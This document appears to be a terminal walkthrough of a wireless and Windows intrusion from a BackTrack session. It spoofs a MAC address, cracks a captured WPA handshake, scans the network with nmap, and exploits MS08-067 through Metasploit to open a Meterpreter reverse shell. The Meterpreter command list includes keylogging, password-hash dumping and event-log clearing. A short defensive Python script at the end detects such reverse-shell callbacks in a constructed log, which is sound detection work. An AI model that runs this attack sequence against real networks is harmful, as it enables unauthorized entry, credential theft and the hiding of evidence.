root@bt:~# airmon-ng

Interface   Chipset           Driver
wlan0       Ralink 2570 USB   rt2500usb - [phy1]
wlan1       Intel 3945ABG     iwl3945 - [phy0]

root@bt:~# airmon-ng start wlan0

Interface   Chipset           Driver
wlan0       Ralink 2570 USB   rt2500usb - [phy1]
                              (monitor mode enabled on mon0)
wlan1       Intel 3945ABG     iwl3945 - [phy0]

root@bt:~# ifconfig mon0 down
root@bt:~# macchanger -r mon0
Current MAC: 4b:6d:a2:bb:3d:42 (Original)
Faked MAC:   1a:1c:ea:c1:a5:41 (unknown)
root@bt:~# ifconfig mon0 up

root@bt:~# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

root@bt:~# airodump-ng mon0
root@bt:~# airodump-ng -c 6 --bssid 31:08:34:1b:5a:21 -w wpapsk mon0

 CH  6 ][ Elapsed: 8 s ][ 2010-10-27 17:50 ][ WPA handshake: 03:CD:B5:34:3D:12

                                 Aircrack-ng 1.0 r1645

                   [00:00:10] 10316 keys tested (978.63 k/s)

                           KEY FOUND! [ proracunska ]

      Master Key     : 72 50 BE B9 53 D8 75 38 F7 55 84 DA 1E BC F3 2A
                       33 2D B0 9B BA D6 F8 8E D6 4F 15 62 61 84 C4 68

      Transient Key  : 59 19 7A 79 A8 AE E3 11 E2 DA 65 E1 63 7A 0C 14
                       BC D3 51 95 45 2D 3B BE 1B 2C 9F AA 6B 3E 3A 73
                       7F E6 3C B0 E6 6F C4 52 00 CF A9 E0 B5 35 0A FB
                       5D 0C D8 57 47 15 3D DF 25 E9 E0 8D 09 CD 0A ED

      EAPOL HMAC     : 29 56 70 5D 1C 12 C3 01 42 0B 71 CE 2B 13 C9 F9
Now I will connect to the network using the same MAC address I had changed to earlier.

root@bt:~# airmon-ng stop mon0
root@bt:~# macchanger -m 1a:1c:ea:c1:a5:41 wlan0

I will start the wicd network manager and connect. Then I will run nmap to see which systems are on my network.

root@bt:~# nmap -O 192.168.1.1/24

-O: operating system detection

Nmap scan report for server.dummy.porta.siemens.net (192.168.1.232)
Host is up (0.0018s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
53/tcp   open  domain
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1029/tcp open  ms-lsa
1031/tcp open  iad2
1032/tcp open  iad3
3389/tcp open  ms-term-serv
MAC Address: A6:DB:CB:21:85:C3 (Microsoft)
Device type: general purpose
Running: Microsoft Windows 2000|XP|2003
OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (9 hosts up) scanned in 11.46 seconds

Since we now know which version is on the network, and code has been released that attacks TCP ports 139 and 445, Windows XP SP3 and Windows Server 2003 are vulnerable to a remote attack. The patch was released on 23.10.2008. I will start Metasploit.

root@bt:~# msfconsole

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 628 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10964 updated 7 days ago (2010.11.09)

msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.232
RHOST => 192.168.1.232
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.223:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 No Service Pack - lang:unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.232
[*] Meterpreter session 1 opened (192.168.1.223:4444 -> 192.168.1.232:445) at 2010-11-16 21:59:39 +0100

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes
meterpreter > idletime
User has been idle for: 6 mins 10 secs

As we can see, we can now manipulate the system further.
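As an added example that is not part of the original write-up: the Metasploit output above shows the pattern a defender can look for in connection logs, namely a host that accepts an inbound SMB connection on 445 and, seconds later, opens a TCP connection back to the same peer on a non-standard port (4444 here, the reverse handler). The log format and the log lines below are constructed for this example; the time window is an assumed tuning value.

```python
import re
from datetime import datetime, timedelta

# Constructed connection log (hypothetical format: "date time src:port -> dst:port proto"),
# modelled on the session above: 192.168.1.223 connects to SMB on 192.168.1.232,
# which then calls back to 192.168.1.223:4444 (the reverse handler).
SAMPLE_LOG = """\
2010-11-16 21:59:30 192.168.1.223:50312 -> 192.168.1.232:445 tcp
2010-11-16 21:59:31 192.168.1.10:51000 -> 192.168.1.232:445 tcp
2010-11-16 21:59:39 192.168.1.232:1047 -> 192.168.1.223:4444 tcp
2010-11-16 22:05:00 192.168.1.232:1050 -> 192.168.1.1:53 udp
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+):(\d+) -> (\S+):(\d+) (\w+)$")
SMB_PORTS = {139, 445}          # the ports the write-up identifies as the attack surface
WINDOW = timedelta(seconds=60)  # assumed: how soon after the SMB connection a callback must follow


def parse(log):
    """Turn the constructed log into (time, src, sport, dst, dport, proto) tuples."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, sport, dst, dport, proto = m.groups()
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       src, int(sport), dst, int(dport), proto))
    return events


def find_reverse_callbacks(events):
    """Flag a host that accepts an SMB connection from a peer and, within WINDOW,
    opens a new TCP connection back to that same peer on a non-SMB port."""
    alerts = []
    inbound_smb = [e for e in events if e[4] in SMB_PORTS and e[5] == "tcp"]
    for ts, src, _sport, dst, dport, proto in events:
        if proto != "tcp" or dport in SMB_PORTS:
            continue
        for its, isrc, _isport, idst, _idport, _ in inbound_smb:
            if idst == src and isrc == dst and timedelta(0) <= ts - its <= WINDOW:
                alerts.append({"victim": src, "attacker": dst, "callback_port": dport,
                               "smb_at": its, "callback_at": ts})
    return alerts


if __name__ == "__main__":
    for a in find_reverse_callbacks(parse(SAMPLE_LOG)):
        print(f"possible reverse shell: {a['victim']} -> {a['attacker']}:{a['callback_port']} "
              f"{(a['callback_at'] - a['smb_at']).seconds}s after inbound SMB")
```

The second SMB connection (from 192.168.1.10) and the DNS query are not flagged, since neither is followed by a callback to the same peer.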